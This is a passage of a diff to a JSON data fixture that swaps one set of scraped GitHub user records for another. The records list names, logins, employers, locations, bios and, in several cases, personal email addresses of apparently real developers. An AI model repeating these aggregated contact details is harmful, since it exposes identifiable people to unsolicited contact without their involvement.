"email": "mgechev@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/455023?v=4", + "company": "Google", + "location": "California", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-05-11T14:12:55Z", - "updated_at": "2024-04-22T08:59:38Z", - "node_id": "MDQ6VXNlcjg0MDI3MTUz", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "following_count": 1, + "followers_count": 9866, + "public_gists_count": 117, + "public_repositories_count": 374, + "created_at": "2010-10-26T17:39:16Z", + "updated_at": "2024-09-11T20:37:52Z", + "node_id": "MDQ6VXNlcjQ1NTAyMw==", + "bio": "Working on having better web frameworks 🇧🇬🇺🇸", + "is_hireable": true, + "twitter_username": "mgechev" } }, { "model": "github.user", - "pk": 1547, + "pk": 6835, "fields": { - "nest_created_at": "2024-09-12T00:08:09.665Z", - "nest_updated_at": "2024-09-12T00:08:09.665Z", - "name": "Nathan Naveen", - "login": "nathannaveen", + "nest_created_at": "2024-09-22T07:48:27.631Z", + "nest_updated_at": "2024-09-22T18:51:01.225Z", + "name": "Mikolaj Mackowiak", + "login": "miqm", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/42319948?v=4", - "company": "@kusaridev", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7921224?v=4", + "company": "@netguru ", + "location": "Poznan, Poland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 18, - "public_gists_count": 9, - "public_repositories_count": 60, - "created_at": "2018-08-12T14:54:21Z", - "updated_at": "2024-09-09T12:06:38Z", - "node_id": "MDQ6VXNlcjQyMzE5OTQ4", - "bio": "Software Engineer / 12th Grader", + "following_count": 3, + "followers_count": 13, + "public_gists_count": 8, + "public_repositories_count": 16, + "created_at": "2014-06-18T08:39:04Z", + "updated_at": "2024-09-15T19:57:17Z", + "node_id": "MDQ6VXNlcjc5MjEyMjQ=", + "bio": "Microsoft Azure MVP & Cloud Architect", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1548, + "pk": 6836, "fields": { - "nest_created_at": "2024-09-12T00:08:37.179Z", - "nest_updated_at": "2024-09-12T00:08:37.179Z", - "name": "Brian Williams", - "login": "Brcrwilliams", + "nest_created_at": "2024-09-22T07:48:27.944Z", + "nest_updated_at": "2024-09-22T18:51:01.530Z", + "name": "Mikhail Ushanov", + "login": "gmmephisto", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22383546?v=4", - "company": "GitLab", - "location": "Austin, Texas, USA", + "avatar_url": "https://avatars.githubusercontent.com/u/1840423?v=4", + "company": "VK Cloud", + "location": "Moscow, Russia", "collaborators_count": 0, - "following_count": 3, - "followers_count": 6, - "public_gists_count": 5, - "public_repositories_count": 29, - "created_at": "2016-09-23T01:15:21Z", - "updated_at": "2024-07-16T00:41:14Z", - "node_id": "MDQ6VXNlcjIyMzgzNTQ2", - "bio": "Container Security, Software Supply Chain Security, Cryptography", + "following_count": 6, + "followers_count": 18, + "public_gists_count": 8, + "public_repositories_count": 58, + "created_at": "2012-06-11T23:11:35Z", + "updated_at": "2024-07-08T17:16:45Z", + "node_id": "MDQ6VXNlcjE4NDA0MjM=", + "bio": "Cloud Engineer @vk-cs, ex-@C2Devel", "is_hireable": false, - "twitter_username": "" + "twitter_username": "gmmephisto" } }, { "model": "github.user", - "pk": 1549, + "pk": 6837, "fields": { - "nest_created_at": "2024-09-12T00:08:41.639Z", - "nest_updated_at": "2024-09-12T00:08:41.639Z", - "name": "", - "login": "pjdowner", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6304954?v=4", + "nest_created_at": "2024-09-22T07:48:28.258Z", + "nest_updated_at": "2024-09-22T18:51:01.848Z", + "name": "Mike Luby", + "login": "mikeluby", + "email": "lubymike@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/163166?v=4", "company": "", - "location": "", + "location": "New York, NY", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2014-01-02T17:00:15Z", - "updated_at": "2024-09-10T14:17:49Z", - "node_id": "MDQ6VXNlcjYzMDQ5NTQ=", + "following_count": 5, + "followers_count": 10, + "public_gists_count": 2, + "public_repositories_count": 3, + "created_at": "2009-12-06T01:41:09Z", + "updated_at": "2024-08-01T11:39:43Z", + "node_id": "MDQ6VXNlcjE2MzE2Ng==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "mikeluby" } }, { "model": "github.user", - "pk": 1550, + "pk": 6838, "fields": { - "nest_created_at": "2024-09-12T00:08:42.474Z", - "nest_updated_at": "2024-09-12T00:08:42.474Z", - "name": "Gernot Hillier", - "login": "gernot-h", - "email": "gernot.hillier@siemens.com", - "avatar_url": "https://avatars.githubusercontent.com/u/2518769?v=4", - "company": "Siemens AG, Technology, Linux Expert Center", - "location": "Munich", + "nest_created_at": "2024-09-22T07:48:28.600Z", + "nest_updated_at": "2024-09-22T18:51:02.178Z", + "name": "Mifield", + "login": "mifieldxu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5520179?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 1, - "followers_count": 27, - "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2012-10-09T09:18:50Z", - "updated_at": "2024-09-03T05:57:11Z", - "node_id": "MDQ6VXNlcjI1MTg3Njk=", - "bio": "Open Source enthusiast. Member of Linux Expert Center @ Siemens. Contributor to FHEM and OpenStreetMap.", + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 35, + "created_at": "2013-09-23T15:43:49Z", + "updated_at": "2024-04-04T19:01:05Z", + "node_id": "MDQ6VXNlcjU1MjAxNzk=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1551, + "pk": 6839, "fields": { - "nest_created_at": "2024-09-12T00:08:44.149Z", - "nest_updated_at": "2024-09-12T00:08:44.149Z", - "name": "", - "login": "mschusterbsi", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/169141269?v=4", + "nest_created_at": "2024-09-22T07:48:28.917Z", + "nest_updated_at": "2024-09-22T18:51:02.489Z", + "name": "Michal Vanko", + "login": "michalvankodev", + "email": "michalvankosk@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2760618?v=4", "company": "", - "location": "", + "location": "Košice", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 21, + "followers_count": 20, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-05-07T08:44:26Z", - "updated_at": "2024-08-12T08:13:12Z", - "node_id": "U_kgDOChTkFQ", - "bio": "", + "public_repositories_count": 37, + "created_at": "2012-11-09T17:26:26Z", + "updated_at": "2024-07-22T15:44:27Z", + "node_id": "MDQ6VXNlcjI3NjA2MTg=", + "bio": "I'm passionate about software development. I've been programming web-applications since I was 14 years old.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "michalvankodev" } }, { "model": "github.user", - "pk": 1552, + "pk": 6840, "fields": { - "nest_created_at": "2024-09-12T00:08:45.026Z", - "nest_updated_at": "2024-09-12T00:08:45.026Z", - "name": "Maximilian Combüchen", - "login": "mcombuechen", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1739114?v=4", - "company": "Snyk Ltd.", - "location": "Berlin, Germany", + "nest_created_at": "2024-09-22T07:48:29.232Z", + "nest_updated_at": "2024-09-22T18:51:02.796Z", + "name": "Michael Zetterberg fd. Lopez", + "login": "michaellopez", + "email": "michael@weahead.se", + "avatar_url": "https://avatars.githubusercontent.com/u/487039?v=4", + "company": "@weahead", + "location": "Stockholm, Sweden", "collaborators_count": 0, - "following_count": 0, - "followers_count": 6, - "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2012-05-14T20:14:38Z", - "updated_at": "2024-09-06T11:43:08Z", - "node_id": "MDQ6VXNlcjE3MzkxMTQ=", - "bio": "Software Engineer", + "following_count": 1, + "followers_count": 16, + "public_gists_count": 25, + "public_repositories_count": 68, + "created_at": "2010-11-18T13:38:29Z", + "updated_at": "2024-09-08T14:33:09Z", + "node_id": "MDQ6VXNlcjQ4NzAzOQ==", + "bio": "CTO at @weahead ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1553, + "pk": 6841, "fields": { - "nest_created_at": "2024-09-12T00:08:46.269Z", - "nest_updated_at": "2024-09-12T00:08:46.269Z", - "name": "xavier zebier", - "login": "tixu", + "nest_created_at": "2024-09-22T07:48:29.860Z", + "nest_updated_at": "2024-09-22T18:51:03.433Z", + "name": "Michael Scharl", + "login": "mscharl", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/824870?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1411972?v=4", + "company": "@massiveart ", + "location": "Wiener Neustadt", "collaborators_count": 0, - "following_count": 6, - "followers_count": 4, - "public_gists_count": 14, - "public_repositories_count": 70, - "created_at": "2011-06-02T07:54:00Z", - "updated_at": "2024-08-29T09:47:58Z", - "node_id": "MDQ6VXNlcjgyNDg3MA==", + "following_count": 2, + "followers_count": 8, + "public_gists_count": 8, + "public_repositories_count": 33, + "created_at": "2012-02-06T09:16:11Z", + "updated_at": "2024-09-13T05:33:43Z", + "node_id": "MDQ6VXNlcjE0MTE5NzI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -399078,24 +656952,24 @@ }, { "model": "github.user", - "pk": 1554, + "pk": 6842, "fields": { - "nest_created_at": "2024-09-12T00:08:47.492Z", - "nest_updated_at": "2024-09-12T00:08:47.492Z", - "name": "", - "login": "volkdm", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1552419?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:48:30.175Z", + "nest_updated_at": "2024-09-22T18:51:03.751Z", + "name": "Michael Kriese", + "login": "viceice", + "email": "michael.kriese@visualon.de", + "avatar_url": "https://avatars.githubusercontent.com/u/1798109?v=4", + "company": "@visualon ", + "location": "Magdeburg, Germany", "collaborators_count": 0, - "following_count": 2, - "followers_count": 11, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2012-03-19T10:40:12Z", - "updated_at": "2024-07-10T09:33:27Z", - "node_id": "MDQ6VXNlcjE1NTI0MTk=", + "following_count": 21, + "followers_count": 60, + "public_gists_count": 12, + "public_repositories_count": 125, + "created_at": "2012-05-31T08:58:00Z", + "updated_at": "2024-09-14T11:46:38Z", + "node_id": "MDQ6VXNlcjE3OTgxMDk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -399103,24 +656977,24 @@ }, { "model": "github.user", - "pk": 1555, + "pk": 6843, "fields": { - "nest_created_at": "2024-09-12T00:08:52.258Z", - "nest_updated_at": "2024-09-12T00:08:52.258Z", - "name": "", - "login": "benjsc", + "nest_created_at": "2024-09-22T07:48:30.490Z", + "nest_updated_at": "2024-09-22T18:51:04.067Z", + "name": "Michael Hoglan", + "login": "mhoglan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2476838?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5976085?v=4", + "company": "@rewardStyle ", + "location": "Dallas, TX", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2012-10-03T05:25:34Z", - "updated_at": "2024-08-12T21:39:43Z", - "node_id": "MDQ6VXNlcjI0NzY4Mzg=", + "public_repositories_count": 27, + "created_at": "2013-11-19T03:54:35Z", + "updated_at": "2024-08-21T17:02:51Z", + "node_id": "MDQ6VXNlcjU5NzYwODU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -399128,24 +657002,24 @@ }, { "model": "github.user", - "pk": 1556, + "pk": 6844, "fields": { - "nest_created_at": "2024-09-12T00:08:53.531Z", - "nest_updated_at": "2024-09-12T00:08:53.531Z", - "name": "Ria Schalnat", - "login": "Pizza-Ria", + "nest_created_at": "2024-09-22T07:48:30.810Z", + "nest_updated_at": "2024-09-22T18:51:04.400Z", + "name": "Paul Bruce", + "login": "paulsbruce", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46799628?v=4", - "company": "@HPE", - "location": "Seattle, Washington", + "avatar_url": "https://avatars.githubusercontent.com/u/8961042?v=4", + "company": "", + "location": "Greater Boston", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, + "following_count": 7, + "followers_count": 14, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2019-01-17T23:14:46Z", - "updated_at": "2024-09-10T15:38:10Z", - "node_id": "MDQ6VXNlcjQ2Nzk5NjI4", + "public_repositories_count": 40, + "created_at": "2014-09-29T16:03:52Z", + "updated_at": "2024-09-10T13:39:44Z", + "node_id": "MDQ6VXNlcjg5NjEwNDI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -399153,49 +657027,49 @@ }, { "model": "github.user", - "pk": 1557, + "pk": 6845, "fields": { - "nest_created_at": "2024-09-12T00:09:14.384Z", - "nest_updated_at": "2024-09-12T00:09:14.384Z", - "name": "William Bartholomew", - "login": "iamwillbar", - "email": "wdb@willbar.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3266447?v=4", - "company": "@microsoft ", - "location": "Issaquah, WA", + "nest_created_at": "2024-09-22T07:48:31.156Z", + "nest_updated_at": "2024-09-22T18:51:04.710Z", + "name": "Patrick Boettcher", + "login": "pboettch", + "email": "patrick.boettcher@posteo.de", + "avatar_url": "https://avatars.githubusercontent.com/u/442684?v=4", + "company": "YAISE", + "location": "Paris, France, Europe", "collaborators_count": 0, - "following_count": 2, - "followers_count": 59, - "public_gists_count": 6, - "public_repositories_count": 10, - "created_at": "2013-01-14T15:44:05Z", - "updated_at": "2024-08-20T23:54:21Z", - "node_id": "MDQ6VXNlcjMyNjY0NDc=", - "bio": "He/him, Australian-born, USA-residing Principal Security Strategist - Cybersecurity Policy at Microsoft. Friction fighter.", + "following_count": 44, + "followers_count": 37, + "public_gists_count": 1, + "public_repositories_count": 54, + "created_at": "2010-10-17T12:35:42Z", + "updated_at": "2024-08-25T15:10:16Z", + "node_id": "MDQ6VXNlcjQ0MjY4NA==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1558, + "pk": 6846, "fields": { - "nest_created_at": "2024-09-12T00:09:19.889Z", - "nest_updated_at": "2024-09-12T00:09:19.889Z", - "name": "Federico Mengozzi", - "login": "fedemengo", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19249682?v=4", - "company": "@sysdig", - "location": "$HOME", + "nest_created_at": "2024-09-22T07:48:31.465Z", + "nest_updated_at": "2024-09-22T18:51:05.032Z", + "name": "Parker Mauney", + "login": "ParkerM", + "email": "parkermauney+git@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5124113?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 259, - "followers_count": 58, - "public_gists_count": 12, - "public_repositories_count": 30, - "created_at": "2016-05-08T10:23:53Z", - "updated_at": "2024-09-10T05:50:26Z", - "node_id": "MDQ6VXNlcjE5MjQ5Njgy", + "following_count": 18, + "followers_count": 16, + "public_gists_count": 1, + "public_repositories_count": 76, + "created_at": "2013-07-30T20:14:57Z", + "updated_at": "2024-06-28T16:35:22Z", + "node_id": "MDQ6VXNlcjUxMjQxMTM=", "bio": "", "is_hireable": true, "twitter_username": "" @@ -399203,74 +657077,24 @@ }, { "model": "github.user", - "pk": 1559, + "pk": 6847, "fields": { - "nest_created_at": "2024-09-12T00:09:20.736Z", - "nest_updated_at": "2024-09-12T00:09:20.736Z", - "name": "A.J. Stein", - "login": "aj-stein-nist", - "email": "aj@nist.gov", - "avatar_url": "https://avatars.githubusercontent.com/u/94922603?v=4", - "company": "@usnistgov", + "nest_created_at": "2024-09-22T07:48:31.781Z", + "nest_updated_at": "2024-09-22T18:51:05.364Z", + "name": "Papaia", + "login": "papaia", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43409674?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 26, - "followers_count": 42, - "public_gists_count": 74, - "public_repositories_count": 162, - "created_at": "2021-11-23T16:40:42Z", - "updated_at": "2024-07-25T15:59:52Z", - "node_id": "U_kgDOBahnaw", - "bio": "", - "is_hireable": false, - "twitter_username": "NISTCyber" - } -}, -{ - "model": "github.user", - "pk": 1560, - "fields": { - "nest_created_at": "2024-09-12T00:09:22.010Z", - "nest_updated_at": "2024-09-18T18:59:53.706Z", - "name": "Olle E. Johansson", - "login": "oej", - "email": "oej@edvina.net", - "avatar_url": "https://avatars.githubusercontent.com/u/20310?v=4", - "company": "Edvina AB - @edvinanet ", - "location": "Sollentuna, Sweden", - "collaborators_count": 0, - "following_count": 14, - "followers_count": 77, - "public_gists_count": 4, - "public_repositories_count": 29, - "created_at": "2008-08-11T19:34:57Z", - "updated_at": "2024-09-10T16:30:31Z", - "node_id": "MDQ6VXNlcjIwMzEw", - "bio": "Working with realtime communication, software supply chain security, PKI and more. Active in IETF, OWASP and in the kamailio.org Open Source SIP server project", - "is_hireable": false, - "twitter_username": "" - } -}, -{ - "model": "github.user", - "pk": 1561, - "fields": { - "nest_created_at": "2024-09-12T00:09:24.108Z", - "nest_updated_at": "2024-09-12T00:09:24.108Z", - "name": "Christopher Gates", - "login": "christophergates", - "email": "chris.gates@velentium.com", - "avatar_url": "https://avatars.githubusercontent.com/u/29800057?v=4", - "company": "Velentium", - "location": "Henderson NV.", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 15, + "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2017-06-30T14:39:03Z", - "updated_at": "2023-06-21T14:58:15Z", - "node_id": "MDQ6VXNlcjI5ODAwMDU3", + "public_repositories_count": 22, + "created_at": "2018-09-19T12:11:23Z", + "updated_at": "2024-09-01T11:52:31Z", + "node_id": "MDQ6VXNlcjQzNDA5Njc0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -399278,174 +657102,174 @@ }, { "model": "github.user", - "pk": 1562, + "pk": 6848, "fields": { - "nest_created_at": "2024-09-12T00:09:24.950Z", - "nest_updated_at": "2024-09-12T00:09:24.950Z", - "name": "Benji Visser", - "login": "noqcks", - "email": "benji@xeol.io", - "avatar_url": "https://avatars.githubusercontent.com/u/4740147?v=4", - "company": "Xeol", - "location": "Toronto, ON", + "nest_created_at": "2024-09-22T07:48:32.087Z", + "nest_updated_at": "2024-09-22T18:51:05.681Z", + "name": "Orta Therox", + "login": "orta", + "email": "git@orta.io", + "avatar_url": "https://avatars.githubusercontent.com/u/49038?v=4", + "company": "", + "location": "Huddersfield / NYC / Dublin / Rio de Janeiro", "collaborators_count": 0, - "following_count": 108, - "followers_count": 69, - "public_gists_count": 44, - "public_repositories_count": 484, - "created_at": "2013-06-19T16:18:26Z", - "updated_at": "2024-09-01T13:56:10Z", - "node_id": "MDQ6VXNlcjQ3NDAxNDc=", - "bio": "Founder @xeol-io ", + "following_count": 109, + "followers_count": 6006, + "public_gists_count": 138, + "public_repositories_count": 952, + "created_at": "2009-01-24T20:40:31Z", + "updated_at": "2024-07-25T11:24:23Z", + "node_id": "MDQ6VXNlcjQ5MDM4", + "bio": "Tech on @puzzmo-com \r\n\r\nEx-TypeScript. Contributed to: Shiki, Shiki Twoslash, Danger, CocoaPods, Jest, GraphQL, RxSwift & Svelte", "is_hireable": false, - "twitter_username": "" + "twitter_username": "orta" } }, { "model": "github.user", - "pk": 1563, + "pk": 6849, "fields": { - "nest_created_at": "2024-09-12T00:09:30.127Z", - "nest_updated_at": "2024-09-18T19:02:04.626Z", - "name": "SasanLabs", - "login": "SasanLabs", - "email": "preetkaran20@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/55012000?v=4", + "nest_created_at": "2024-09-22T07:48:32.421Z", + "nest_updated_at": "2024-09-22T18:51:06.010Z", + "name": "Ondra Pelech", + "login": "sideeffffect", + "email": "ondra.pelech@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9019485?v=4", "company": "", - "location": "Canada", + "location": "Prague, Czech Republic", "collaborators_count": 0, - "following_count": 0, - "followers_count": 15, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2019-09-07T04:51:26Z", - "updated_at": "2024-09-13T16:17:51Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjU1MDEyMDAw", - "bio": "No power on earth can stop an idea whose time has come.", - "is_hireable": false, + "following_count": 5, + "followers_count": 39, + "public_gists_count": 4, + "public_repositories_count": 212, + "created_at": "2014-10-04T16:06:53Z", + "updated_at": "2024-08-24T11:26:44Z", + "node_id": "MDQ6VXNlcjkwMTk0ODU=", + "bio": "", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1564, + "pk": 6850, "fields": { - "nest_created_at": "2024-09-12T00:09:33.308Z", - "nest_updated_at": "2024-09-18T19:02:07.146Z", - "name": "Karan Preet Singh Sasan", - "login": "preetkaran20", - "email": "preetkaran20@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/13570884?v=4", - "company": "Microsoft", - "location": "Surrey, BC", + "nest_created_at": "2024-09-22T07:48:32.734Z", + "nest_updated_at": "2024-09-22T18:51:06.323Z", + "name": "Oleksandr T.", + "login": "a-tarasyuk", + "email": "oleksandr.tarasiuk@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/509265?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 24, - "public_gists_count": 4, - "public_repositories_count": 31, - "created_at": "2015-07-30T11:33:00Z", - "updated_at": "2024-09-13T18:16:52Z", - "node_id": "MDQ6VXNlcjEzNTcwODg0", - "bio": "OWASP VulnerableApp project lead, Open-Source organisation @SasanLabs, @zaproxy @owasp", + "following_count": 1, + "followers_count": 201, + "public_gists_count": 31, + "public_repositories_count": 39, + "created_at": "2010-12-04T14:35:53Z", + "updated_at": "2024-08-24T11:21:53Z", + "node_id": "MDQ6VXNlcjUwOTI2NQ==", + "bio": "OSS enthusiast. \r\n\r\nBuy Me a Coffee - https://ko-fi.com/oleksandr", "is_hireable": true, - "twitter_username": "sasan_karan" + "twitter_username": "tarasiuk_o" } }, { "model": "github.user", - "pk": 1565, + "pk": 6851, "fields": { - "nest_created_at": "2024-09-12T00:09:45.141Z", - "nest_updated_at": "2024-09-18T18:59:58.090Z", - "name": "Kushal Singh", - "login": "kushalsng", + "nest_created_at": "2024-09-22T07:48:33.047Z", + "nest_updated_at": "2024-09-22T18:51:06.664Z", + "name": "Oleg Butuzov ", + "login": "butuzov", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/59888324?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/651824?v=4", "company": "", - "location": "", + "location": "Kyiv, Ukraine", "collaborators_count": 0, - "following_count": 4, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 33, - "created_at": "2020-01-14T17:40:45Z", - "updated_at": "2024-08-26T13:37:06Z", - "node_id": "MDQ6VXNlcjU5ODg4MzI0", - "bio": "Software Engineer | MERN stack enthusiast | Hacktoberfest 2022 winner", + "following_count": 21, + "followers_count": 82, + "public_gists_count": 15, + "public_repositories_count": 40, + "created_at": "2011-03-04T23:01:11Z", + "updated_at": "2024-08-24T17:47:51Z", + "node_id": "MDQ6VXNlcjY1MTgyNA==", + "bio": "Was simply coding Python and Go,\r\nBut rashists come right to my door, \r\nI am in the army now,\r\nOh-oo-oh I'm in the army now... ", "is_hireable": false, - "twitter_username": "kushalsng" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1566, + "pk": 6852, "fields": { - "nest_created_at": "2024-09-12T00:09:55.549Z", - "nest_updated_at": "2024-09-12T00:09:55.549Z", - "name": "Amrendra Nath ", - "login": "amrendranath", - "email": "cool.amrendrasrivastav@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/46886429?v=4", - "company": "Genpact", - "location": "India", + "nest_created_at": "2024-09-22T07:48:33.364Z", + "nest_updated_at": "2024-09-22T18:51:06.975Z", + "name": "Noelle Leigh", + "login": "noelleleigh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5957867?v=4", + "company": "@DirectEmployers ", + "location": "", "collaborators_count": 0, - "following_count": 30, - "followers_count": 13, - "public_gists_count": 1, - "public_repositories_count": 43, - "created_at": "2019-01-21T08:28:06Z", - "updated_at": "2024-06-08T14:07:08Z", - "node_id": "MDQ6VXNlcjQ2ODg2NDI5", - "bio": "Creative and adaptable Front-End Developer with 6+ years of experience building stable websites and apps in fast-paced, collaborative environments.", + "following_count": 10, + "followers_count": 58, + "public_gists_count": 16, + "public_repositories_count": 56, + "created_at": "2013-11-16T22:32:23Z", + "updated_at": "2024-09-15T18:45:38Z", + "node_id": "MDQ6VXNlcjU5NTc4Njc=", + "bio": "Python developer, loves toying with JavaScript.\r\n\r\n(Picture from EXAPUNKS)", "is_hireable": false, - "twitter_username": "amrendranath26" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1567, + "pk": 6853, "fields": { - "nest_created_at": "2024-09-12T00:10:05.673Z", - "nest_updated_at": "2024-09-12T00:10:10.457Z", - "name": "Justin Hong", - "login": "Dripcoding", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/65139698?v=4", - "company": "Twilio", - "location": "Seattle Washington", + "nest_created_at": "2024-09-22T07:48:33.674Z", + "nest_updated_at": "2024-09-22T18:51:07.290Z", + "name": "Nils Knappmeier", + "login": "nknapp", + "email": "npm@knappi.org", + "avatar_url": "https://avatars.githubusercontent.com/u/636150?v=4", + "company": "@cosee", + "location": "Germany", "collaborators_count": 0, "following_count": 6, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 34, - "created_at": "2020-05-10T23:44:42Z", - "updated_at": "2024-08-13T22:13:21Z", - "node_id": "MDQ6VXNlcjY1MTM5Njk4", - "bio": "Full stack software developer", + "followers_count": 39, + "public_gists_count": 17, + "public_repositories_count": 110, + "created_at": "2011-02-24T14:54:43Z", + "updated_at": "2024-08-17T12:25:50Z", + "node_id": "MDQ6VXNlcjYzNjE1MA==", + "bio": "Java developer at work, NodeJS and Open-Source enthusiast at home.\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1568, + "pk": 6854, "fields": { - "nest_created_at": "2024-09-12T00:10:20.200Z", - "nest_updated_at": "2024-09-18T19:00:01.296Z", + "nest_created_at": "2024-09-22T07:48:33.996Z", + "nest_updated_at": "2024-09-22T18:51:07.615Z", "name": "", - "login": "DenisPodgurskii", - "email": "denis.podgurskiy@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/197029?v=4", + "login": "NicoBeyer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17759227?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 23, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2010-02-04T19:56:38Z", - "updated_at": "2024-08-23T08:20:24Z", - "node_id": "MDQ6VXNlcjE5NzAyOQ==", + "public_repositories_count": 3, + "created_at": "2016-03-10T07:31:08Z", + "updated_at": "2024-09-19T08:30:42Z", + "node_id": "MDQ6VXNlcjE3NzU5MjI3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -399453,124 +657277,149 @@ }, { "model": "github.user", - "pk": 1569, + "pk": 6855, "fields": { - "nest_created_at": "2024-09-12T00:10:24.225Z", - "nest_updated_at": "2024-09-18T19:00:18.887Z", - "name": "DSecure.me", - "login": "DSecureMe", - "email": "contact@dsecure.me", - "avatar_url": "https://avatars.githubusercontent.com/u/56408412?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:48:34.318Z", + "nest_updated_at": "2024-09-22T18:51:07.917Z", + "name": "Nico Jansen", + "login": "nicojs", + "email": "jansennico@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1828233?v=4", + "company": "Info Support", + "location": "Veenendaal", "collaborators_count": 0, - "following_count": 0, - "followers_count": 10, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2019-10-10T17:44:15Z", - "updated_at": "2021-04-08T15:21:57Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjU2NDA4NDEy", - "bio": "DSecure.me is a group of people connected by a common passion - security.", + "following_count": 15, + "followers_count": 183, + "public_gists_count": 1, + "public_repositories_count": 168, + "created_at": "2012-06-07T19:48:30Z", + "updated_at": "2024-09-21T09:46:49Z", + "node_id": "MDQ6VXNlcjE4MjgyMzM=", + "bio": "🤝 Open source advocate\r\n👽 Maintainer of @stryker_mutator\r\n💼 Manager and trainer @InfoSupportBV\r\n💚 Loves green energy and EVs", "is_hireable": false, - "twitter_username": "" + "twitter_username": "_nicojs" } }, { "model": "github.user", - "pk": 1570, + "pk": 6856, "fields": { - "nest_created_at": "2024-09-12T00:10:27.387Z", - "nest_updated_at": "2024-09-13T05:15:45.363Z", - "name": "Michał Walkowski", - "login": "mwalkowski", + "nest_created_at": "2024-09-22T07:48:34.628Z", + "nest_updated_at": "2024-09-22T18:51:08.263Z", + "name": "Neil Smith", + "login": "nmsmith22389", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/673031?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8648114?v=4", "company": "", - "location": "Poland", + "location": "", "collaborators_count": 0, - "following_count": 26, - "followers_count": 26, - "public_gists_count": 6, - "public_repositories_count": 11, - "created_at": "2011-03-16T12:54:33Z", - "updated_at": "2024-09-04T08:08:20Z", - "node_id": "MDQ6VXNlcjY3MzAzMQ==", + "following_count": 1, + "followers_count": 5, + "public_gists_count": 15, + "public_repositories_count": 36, + "created_at": "2014-09-03T22:17:44Z", + "updated_at": 